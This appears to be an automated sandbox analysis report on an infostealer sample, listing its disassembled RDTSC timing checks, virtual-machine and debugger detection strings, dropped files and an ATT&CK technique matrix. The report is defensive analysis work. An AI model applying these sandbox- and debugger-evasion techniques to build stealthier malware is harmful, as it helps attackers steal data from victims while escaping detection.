Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30DD5 second address: 4D30E11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7F91348E2Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7F91348E2Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30E11 second address: 4D30E20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30E20 second address: 4D30E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F91348E2Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D517DF second address: 4D517E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D517E5 second address: 4D517EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D517EA second address: 4D51825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7F9153F87Ah 0x0000000a adc ch, FFFFFFF8h 0x0000000d jmp 00007F7F9153F87Bh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push dword ptr [ebp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7F9153F885h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D9030E second address: 4D30D7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp dword ptr [7721155Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 mov ecx, dword ptr fs:[00000018h] 0x0000001b mov eax, dword ptr [ebp+08h] 0x0000001e mov dword ptr [ecx+34h], 00000000h 0x00000025 cmp eax, 40h 0x00000028 jnc 00007F7F91348E2Dh 0x0000002a mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000031 pop ebp 0x00000032 retn 0004h 0x00000035 test eax, eax 0x00000037 je 00007F7F91348E43h 0x00000039 mov eax, dword ptr [00432010h] 0x0000003e cmp eax, FFFFFFFFh 0x00000041 je 00007F7F91348E39h 0x00000043 mov esi, 0042F218h 0x00000048 push esi 0x00000049 call 00007F7F95C7824Dh 0x0000004e mov edi, edi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 mov bl, 3Eh 0x00000055 mov eax, 34C6E0C5h 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30A29 second address: 4D30A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30A2D second address: 4D30A8C instructions: 0x00000000 rdtsc 0x00000002 mov cx, 7C0Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7F91348E37h 0x00000011 jmp 00007F7F91348E33h 0x00000016 popfd 0x00000017 mov si, ECBFh 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e mov di, si 0x00000021 mov ax, E553h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F7F91348E35h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30A8C second address: 4D30AFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7F9153F887h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F7F9153F889h 0x0000000f xor ax, 3526h 0x00000014 jmp 00007F7F9153F881h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ecx, dword ptr [ebp+08h] 0x00000020 jmp 00007F7F9153F87Eh 0x00000025 sub eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F7F9153F87Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D30AFC second address: 4D30B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc eax 0x0000000a jmp 00007F7F91348E36h 0x0000000f lock xadd dword ptr [ecx], eax 0x00000013 pushad 0x00000014 mov si, 17EDh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D904DD second address: 4D904E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D904E3 second address: 4D904E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90F07 second address: 4D90F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, F215h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F7F9153F881h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov edi, 4C2B7E7Eh 0x0000001b mov eax, ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90F31 second address: 4D90F57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, 0B3BFE73h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7F91348E35h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90DFC second address: 4D90E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E00 second address: 4D90E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E06 second address: 4D90E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E0C second address: 4D90E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E10 second address: 4D90E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E1E second address: 4D90E2F instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E2F second address: 4D90E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E34 second address: 4D90E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F91348E2Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E42 second address: 4D90E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E5A second address: 4D90E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E5E second address: 4D90E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E62 second address: 4D90E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E68 second address: 4D90E8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7F9153F880h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 4D90E8F second address: 4D90E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSpecial instruction interceptor: First address: 81C719 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSpecial instruction interceptor: First address: 81C7CD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSpecial instruction interceptor: First address: 9B9B7F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSpecial instruction interceptor: First address: 9DF6EC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSpecial instruction interceptor: First address: A45DBD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9AC94 rdtsc 0_2_00A9AC94
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow / User API: threadDelayed 1288Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow / User API: threadDelayed 1612Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeWindow / User API: threadDelayed 1700Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wuBeweeRz\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wuBeweeRz\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 4684Thread sleep count: 54 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 4684Thread sleep time: -108054s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 3664Thread sleep count: 55 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 3664Thread sleep time: -110055s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 5412Thread sleep count: 210 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 5412Thread sleep count: 167 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 5412Thread sleep count: 112 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 400Thread sleep count: 1288 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 400Thread sleep time: -2577288s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 3300Thread sleep count: 56 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 3300Thread sleep time: -112056s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 5392Thread sleep count: 1612 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 5392Thread sleep time: -3225612s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 7120Thread sleep count: 1700 > 30Jump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exe TID: 7120Thread sleep time: -3401700s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00415D07 FindFirstFileExW,0_2_00415D07
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B55F6E FindFirstFileExW,0_2_04B55F6E
Source: 3K6rBUOQ2z.exe, 3K6rBUOQ2z.exe, 00000000.00000002.2702508722.0000000000998000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.9.drBinary or memory string: VMware
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2703382198.0000000001043000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2705531597.00000000055A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.drBinary or memory string: vmci.sys
Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.drBinary or memory string: VMware20,1
Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 3K6rBUOQ2z.exe, 00000000.00000002.2702508722.0000000000998000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile opened: NTICE
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile opened: SICE
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00A9AC94 rdtsc 0_2_00A9AC94
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CF2A6F mov eax, dword ptr fs:[00000030h]0_3_04CF2A6F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CEE30D mov eax, dword ptr fs:[00000030h]0_3_04CEE30D
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]0_2_0041366F
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]0_2_0040EF0D
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00F89D3B push dword ptr fs:[00000030h]0_2_00F89D3B
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B40D90 mov eax, dword ptr fs:[00000030h]0_2_04B40D90
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B538D6 mov eax, dword ptr fs:[00000030h]0_2_04B538D6
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B4092B mov eax, dword ptr fs:[00000030h]0_2_04B4092B
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B4F174 mov eax, dword ptr fs:[00000030h]0_2_04B4F174
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C70
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00409949 SetUnhandledExceptionFilter,0_2_00409949
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408ED5
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004097B2
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B4913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04B4913C
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B49A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B49A19
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B49BB0 SetUnhandledExceptionFilter,0_2_04B49BB0
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_04B4C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B4C31A
Source: 3K6rBUOQ2z.exe, 3K6rBUOQ2z.exe, 00000000.00000002.2702508722.0000000000998000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: -Program Manager
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_3_04CE8DB3 cpuid 0_3_04CE8DB3
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeCode function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409BE5
Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter
1
DLL Side-Loading
2
Process Injection
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
24
Virtualization/Sandbox Evasion
LSASS Memory781
Security Software Discovery
Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection
Security Account Manager24
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS3
Process Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
Software Packing
Cached Domain Credentials2
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync223
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
3K6rBUOQ2z.exe32%ReversingLabsWin32.Infostealer.Generic
